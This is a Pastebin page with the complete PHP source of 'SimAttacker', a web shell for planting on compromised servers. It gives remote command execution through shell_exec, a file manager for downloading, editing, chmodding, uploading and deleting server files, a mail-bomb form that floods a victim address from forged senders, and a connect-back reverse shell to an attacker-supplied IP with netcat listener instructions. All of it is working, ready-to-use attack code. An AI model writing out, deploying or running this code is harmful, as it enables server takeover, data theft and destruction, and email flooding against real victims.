Advertisement
nil_007

Iran Shell

Feb 15th, 2018
345
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 11.70 KB | None | 0 0
  1. <?
  2. //download Files  Code
  3. $fdownload=$_GET['fdownload'];
  4. if ($fdownload <> "" ){
  5. // path & file name
  6. $path_parts = pathinfo("$fdownload");
  7. $entrypath=$path_parts["basename"];
  8. $name = "$fdownload";
  9. $fp = fopen($name, 'rb');
  10. header("Content-Disposition: attachment; filename=$entrypath");
  11. header("Content-Length: " . filesize($name));
  12. fpassthru($fp);
  13. exit;
  14. }
  15. ?>
  16.    
  17. <html>
  18.  
  19. <head>
  20. <meta http-equiv="Content-Language" content="en-us">
  21. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  22. <title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
  23. <style>
  24. <!--
  25. body         { font-family: Tahoma; font-size: 8pt }
  26. -->
  27. </style>
  28. </head>
  29. <body>
  30. <?
  31. error_reporting(E_ERROR | E_WARNING | E_PARSE);
  32.  //File Edit
  33.  $fedit=$_GET['fedit'];
  34.  if ($fedit <> "" ){
  35.  $fedit=realpath($fedit);
  36.  $lines = file($fedit);
  37.  echo "<form action='' method='POST'>";
  38. echo "<textarea name='savefile' rows=30 cols=80>" ;
  39. foreach ($lines as $line_num => $line) {
  40.  echo htmlspecialchars($line);
  41. }
  42. echo "</textarea>
  43.     <input type='text' name='filepath'  size='60' value='$fedit'>
  44.     <input type='submit' value='save'></form>";
  45.     $savefile=$_POST['savefile'];
  46.     $filepath=realpath($_POST['filepath']);
  47.     if ($savefile <> "")
  48.     {
  49.     $fp=fopen("$filepath","w+");
  50.     fwrite ($fp,"") ;
  51.     fwrite ($fp,$savefile) ;
  52.     fclose($fp);
  53.     echo "<script language='javascript'> close()</script>";
  54.     }
  55. exit();
  56.  }
  57. ?>
  58. <?
  59. // CHmod - PRimission
  60. $fchmod=$_GET['fchmod'];
  61. if ($fchmod <> "" ){
  62. $fchmod=realpath($fchmod);
  63. echo "<center><br>
  64. chmod for :$fchmod<br>
  65. <form method='POST' action=''><br>
  66. Chmod :<br>
  67. <input type='text' name='chmod0' ><br>
  68. <input type='submit' value='change chmod'>
  69. </form>";
  70. $chmod0=$_POST['chmod0'];
  71. if ($chmod0 <> ""){
  72. chmod ($fchmod , $chmod0);
  73. }else {
  74. echo "primission Not Allow change Chmod";
  75. }
  76. exit();
  77. }
  78. ?>
  79.    
  80. <div align="center">
  81.     <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
  82.         <tr>
  83.             <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
  84.                 <p align="center"><b>
  85.                 <font face="Tahoma" size="2"><br>
  86.                 </font>
  87.                 <font color="#D2D200" face="Tahoma" size="2">
  88.                 <span style="text-decoration: none">
  89.                 <font color="#000000">
  90.                 <a href="?id=fm&dir=<?
  91.     echo getcwd();
  92.     ?>
  93.     ">
  94.                 <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
  95.                 <p align="center"><b><a href="?id=cmd">
  96.                 <span style="text-decoration: none">
  97.                 <font face="Tahoma" size="2" color="#000000">
  98.                 CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
  99.                 <p align="center"><b><a href="?id=fake-mail">
  100.                 <font face="Tahoma" size="2" color="#000000">
  101.                 <span style="text-decoration: none">Fake mail</span></font></a></b></p>
  102.                 <p align="center"><b>
  103.                 <font face="Tahoma" size="2" color="#000000">
  104.                 <a href="?id=cshell">
  105.                 <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
  106.                 <p align="center"><b>
  107.                 <font color="#000000" face="Tahoma" size="2">
  108.                 <a href="?id=">
  109.                 <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
  110.                 <p>&nbsp;<p align="center">&nbsp;</td>
  111.             <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
  112.             <?
  113.             //*******************************************************
  114.             //Start Programs About US
  115.             $id=$_GET['id'];
  116.             if ($id=="") {
  117.             echo "
  118.             <font face='Arial Black' color='#808080' size='1'>
  119. ***************************************************************************<br>
  120. &nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
  121. &nbsp;Programer : Hossein Asgary <br>
  122. &nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
  123. &nbsp;please : If you find bug or problems in program , tell me by : <br>
  124. &nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
  125. Enjoy :) [Only 4 Best Friends ] <br>
  126. ***************************************************************************</font></span></p>
  127. ";
  128. echo "<font color='#333333' size='2'>OS :". php_uname();
  129. echo "<br>IP :".
  130. ($_SERVER['REMOTE_ADDR']);
  131. echo "</font>";
  132.             }
  133.             //************************************************************
  134.             //cmd-command line
  135.             $cmd=$_POST['cmd'];
  136.             if($id=="cmd"){
  137.         $result=shell_exec("$cmd");
  138.         echo "<br><center><h3> CMD ExeCute </h3></center>" ;
  139.         echo "<center>
  140.         <textarea rows=20 cols=70 >$result</textarea><br>
  141.         <form method='POST' action=''>
  142.         <input type='hidden' name='id' value='cmd'>
  143.         <input type='text' size='80' name='cmd' value='$cmd'>
  144.         <input type='submit' value='cmd'><br>";
  145.            
  146.            
  147.            
  148.             }
  149.            
  150.         //******************************************************** 
  151.        
  152.         //fake mail = Use victim server 4 DOS - fake mail
  153.         if ( $id=="fake-mail"){
  154.         error_reporting(0);
  155.         echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
  156.         echo "<center><form method='post' action=''>
  157.         Victim Mail :<br><input type='text' name='to' ><br>
  158.         Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
  159.         Comments:
  160.         <br>
  161.         <textarea rows='10' cols=50 name='Comments' ></textarea><br>
  162.         <input type='submit' value='Send Mail Strm ' >
  163.         </form></center>";
  164.         //send Storm Mail
  165.         $to=$_POST['to'];
  166.         $nom=$_POST['nom'];
  167.         $Comments=$_POST['Comments'];
  168.         if ($to <> "" ){
  169.         for ($i = 0; $i < $nom ; $i++){
  170.         $from = rand (71,1020000000)."@"."Attacker.com";
  171.         $subject= md5("$from");
  172.         mail($to,$subject,$Comments,"From:$from");
  173.         echo "$i is ok";
  174.         }      
  175.         echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
  176.         }
  177.         }
  178.         //********************************************************
  179.             //Connect Back -Firewall Bypass
  180.             if ($id=="cshell"){
  181.             echo "<br>Connect back Shell , bypass Firewalls<br>
  182.             For user :<br>
  183.             nc -l -p 1019 <br>
  184.             <hr>
  185.             <form method='POST' action=''><br>
  186.             Your IP & BindPort:<br>
  187.             <input type='text' name='mip' >
  188.             <input type='text' name='bport' size='5' value='1019'><br>
  189.             <input type='submit' value='Connect Back'>
  190.             </form>";
  191.          $mip=$_POST['mip'];
  192.          $bport=$_POST['bport'];
  193.          if ($mip <> "")
  194.          {
  195.          $fp=fsockopen($mip , $bport , $errno, $errstr);
  196.          if (!$fp){
  197.                $result = "Error: could not open socket connection";
  198.          }
  199.          else {
  200.          fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
  201.       while(!feof($fp)){
  202.        fputs ($fp," bash # ");
  203.        $result= fgets ($fp, 4096);
  204.       $message=`$result`;
  205.        fputs ($fp,"--> ".$message."\n");
  206.       }
  207.       fclose ($fp);
  208.          }
  209.          }
  210.             }
  211.            
  212.         //********************************************************
  213.             //Spy File Manager
  214.             $homedir=getcwd();
  215.             $dir=realpath($_GET['dir'])."/";
  216.             if ($id=="fm"){
  217.             echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir
  218.                  &nbsp;<b>
  219.                  <form action='' method='GET'>
  220.                  &nbsp;Path:</b>
  221.                  <input type='hidden' name='id' value='fm'>
  222.                  <input type='text' name='dir' size='80' value='$dir'>
  223.                  <input type='submit' value='dir'>
  224.                  </form>
  225.                 <br>";
  226.             echo "
  227. <div align='center'>
  228. <table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
  229.     <tr>
  230.         <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
  231.         <td height='28' width='82' align='center'>
  232.         <font color='#000080' size='2'><b>Size KByte</b></font></td>
  233.         <td height='28' width='83' align='center'>
  234.         <font color='#008000' size='2'><b>Download</b></font></td>
  235.         <td height='28' width='66' align='center'>
  236.         <font color='#FF9933' size='2'><b>Edit</b></font></td>
  237.         <td height='28' width='75' align='center'>
  238.         <font color='#999999' size='2'><b>Chmod</b></font></td>
  239.         <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
  240.     </tr>";
  241.             if (is_dir($dir)){
  242.             if ($dh=opendir($dir)){
  243.             while (($file = readdir($dh)) !== false) {
  244.             $fsize=round(filesize($dir . $file)/1024);
  245.        
  246.            
  247.     echo "
  248.     <tr>
  249.         <th width='250' height='22' align='left' nowrap>";
  250.         if (is_dir($dir.$file))
  251.         {
  252.         echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
  253.         }
  254.         else {
  255.         echo "<font size='2' color='#666666'>&nbsp;$file ";
  256.         }
  257.         echo "</a></font></th>
  258.         <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
  259.         if (is_file($dir.$file))
  260.         {
  261.         echo "$fsize";
  262.         }
  263.         else {
  264.         echo "&nbsp; ";
  265.         }
  266.         echo "
  267.         </b></font></td>
  268.         <td width='103' align='center' nowrap>";
  269.         if (is_file($dir.$file)){
  270.         if (is_readable($dir.$file)){
  271.         echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
  272.         }else {
  273.         echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
  274.          }
  275.         }else {
  276.         echo "&nbsp;";
  277.          }
  278.         echo "
  279.         </a></font></td>
  280.         <td width='77' align='center' nowrap>";
  281.         if (is_file($dir.$file))
  282.         {
  283.         if (is_readable($dir.$file)){
  284.         echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
  285.         }else {
  286.         echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
  287.          }
  288.         }else {
  289.         echo "&nbsp;";
  290.          }
  291.         echo "
  292.         </a></font></td>
  293.         <td width='86' align='center' nowrap>";
  294.         if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  295.         echo "<font size='1' color='#999999'>Dont in windows";
  296.         }
  297.         else {
  298.         echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
  299.         }
  300.         echo "</a></font></td>
  301.         <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
  302.     </tr>
  303.     ";
  304.               }
  305.               closedir($dh);
  306.             }
  307.             }
  308.             echo "</table>
  309. <form enctype='multipart/form-data' action='' method='POST'>
  310. <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
  311. Send this file: <input name='userfile' type='file' />
  312. <inpt type='hidden' name='Fupath'  value='$dir'>
  313. <input type='submit' value='Send File' />
  314. </form>
  315.             </div>";
  316.             }
  317. //Upload Files
  318. $rpath=$_GET['dir'];
  319. if ($rpath <> "") {
  320. $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
  321. print "<pre>";
  322. if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  323. echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
  324. echo "<script language='javascript'> history.back(2)</script>";
  325. }
  326.  }
  327.  //file deleted
  328. $frpath=$_GET['fdelete'];
  329. if ($frpath <> "") {
  330. if (is_dir($frpath)){
  331. $matches = glob($frpath . '/*.*');
  332. if ( is_array ( $matches ) ) {
  333.   foreach ( $matches as $filename) {
  334.   unlink ($filename);
  335.   rmdir("$frpath");
  336. echo "<script language='javascript'> alert('Success! Please refresh')</script>";
  337. echo "<script language='javascript'> history.back(1)</script>";
  338.   }
  339.   }
  340.   }
  341.   else{
  342. echo "<script language='javascript'> alert('Success! Please refresh')</script>";
  343. unlink ("$frpath");
  344. echo "<script language='javascript'> history.back(1)</script>";
  345. exit(0);
  346.   }
  347.  
  348. }
  349.             ?>
  350.            
  351.             </td>
  352.         </tr>
  353.         <tr>
  354.             <td style="border: 1px dotted #FFCC66">
  355.             <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
  356.             Copyright 2004-Simorgh Security<br>
  357.             Hossein-Asgari<br>
  358.             </font><font color="#c0c0c0" size="1" face="Tahoma">
  359.         <a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
  360.         <font color="#666666">www.simorgh-ev.com</font></a></font></td>
  361.         </tr>
  362.     </table>
  363. </div>
  364. </body>
  365. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement